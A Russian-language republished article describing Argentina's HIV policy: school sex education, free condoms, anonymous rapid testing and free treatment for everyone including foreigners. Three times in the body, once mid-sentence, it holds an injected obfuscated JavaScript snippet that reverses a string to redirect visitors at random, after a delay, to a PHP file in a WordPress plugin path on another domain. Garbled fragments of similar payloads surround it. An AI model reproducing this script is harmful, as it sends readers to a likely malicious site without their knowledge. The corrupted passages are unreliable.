ВИЧ в Аргентине: бесплатная терапия и презервативы со школы

Фильм «ВИЧ в России — эпидемия, про которую не говорят» журналиста Юрия Дудя всколыхнул российское общество: количество поисковых запросов, связанных с экспресс-тестами на ВИЧ, в российском сегменте сети выросло в 50 раз. На волне этих интересов рассказываем, как построена система борьбы с ВИЧ/СПИД в Аргентине, где любой человек с ВИЧ+ имеет доступ к бесплатной терапии, а в школах учат правильно надевать презервативы. СПИД.ЦЕНТР с разрешения автора, гида в Аргентине, Кирилла Маковеева републикует статью о профилактике ВИЧ в Аргентине.

Во вторник, 11 февраля, в YouTube был опубликован документальный фильм журналиста Юрия Дудя о ситуации с ВИЧ в России. К концу недели его просмотрели более 12 миллионов человек, которые оставили под публикацией более 90 тысяч комментариев.

Аргентина — одна из самых прогрессивных стран в вопросе борьбы с ВИЧ на всем южноамериканском континенте. По данным аргентинского минздрава, на 44 миллиона жителей страны в 2018 году было зафиксировано около 129 тысяч ВИЧ-инфицированных человек (0,3 % населения).

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}torage/content_module/4459/regular_fullscreen_picture-6cd0bd1233c9af55bb9dc75927c0b4c2.jpg” alt=”” />
Процент населения (от 15 до 49 лет), живущего с ВИЧ в разных странах.

КАК АРГЕНТИНА БОРЕТСЯ С ВИЧ/СПИДОМ?

Уроки о ВИЧ в школе
В Аргентине о ВИЧ/СПИДе говорят везде: по телевизору, в государственной рекламе на YouTube, Facebook и Twitter, со страниц газет и даже школьных учебников. Информация о ВИЧ/СПИДе была включена в школьную программу уроков сексуального воспитания еще в 2006 году.

Со школы учат пользоваться презервативами
Главная цель сексуального просвещения в области ВИЧ/СПИДа — рассказать детям о том, что это за заболевание, как оно передается, как не передается и как можно предотвратить его передачу. В первую очередь, с помощью презервативов. Аргентинский минздрав публикует ролики с участием школьников о том, как правильно пользоваться презервативами. Потому что аргентинцы понимают: пусть лучше ребенок знает, как ими пользоваться, чем не знает.

Бесплатные государственные презервативы везде
Вы можете купить пачку презервативов в магазине, киоске или аптеке, а можете взять бесплатно сколько хотите в поликлиниках, центрах здоровья и любых других местах присутствия государственных и частных медиков. На сайте Минздрава Аргентины можно найти карту пунктов выдачи бесплатных презервативов, в одном только 3,5-миллионном Буэнос-Айресе таких точек выдачи более двухсот пятидесяти.

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tor/pictures/5841/content_1.jpg” alt=”” />

Бесплатное экспресс-тестирование на ВИЧ
Пройти тест на ВИЧ в Аргентине можно практически везде. Ну, строго говоря, в Буэнос-Айресе есть порядка 40 мест, где можно сдать экспресс-тесты. Причем результаты таких тестов являются анонимными и готовы уже через 15 минут. Карта пунктов тестирования на ВИЧ также $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tor/pictures/5842/content_2.jpg” alt=”” />

Бесплатная терапия. Медицинская и психологическая
В Аргентине бесплатную терапию против ВИЧ может получить каждый. В том числе иностранцы. Это позволяет держать удивительно низкими (5,8 тысячи случаев в 2018 году) показатели новых выявленных случаев заражения. Скажу больше: огромная часть (минздрав не отрицает ее наличие, но не уточняет размеры) таких случаев — это как раз иностранцы, которые приехали в Аргентину для лечения.

Вопросов о целесообразности лечения «чужих» ВИЧ-положительных в Аргентине не задают. Потому что прекрасно понимают, что люди, которые получают своевременное лечение, абсолютно не заразны и находятся в полной безопасности. И другого способа борьбы с ВИЧ до изобретения вакцины не существует. Ну а психологическое потрясение, которое переживает человек, узнающий, что болен неизлечимой болезнью, — явный повод для реализации закрепленного в законе права на бесплатную психотерапию.

***

Когда я вожу свои экскурсии по Буэнос-Айресу, то почти всегда рассказываю, что у нас в стране бесплатное образование и бесплатная медицина. И через паузу говорю, что медицина у нас бесплатная для всех. Вообще для всех. Даже для моих туристов. И не только, если они ногу сломают или аппендикс у них воспалится, но и если они больны раком или ВИЧ. И нуждаются в лечении. Жить в стране, в которой жизнь каждого важна, очень приятно. Это то, чем действительно хочется гордиться.

Все новости »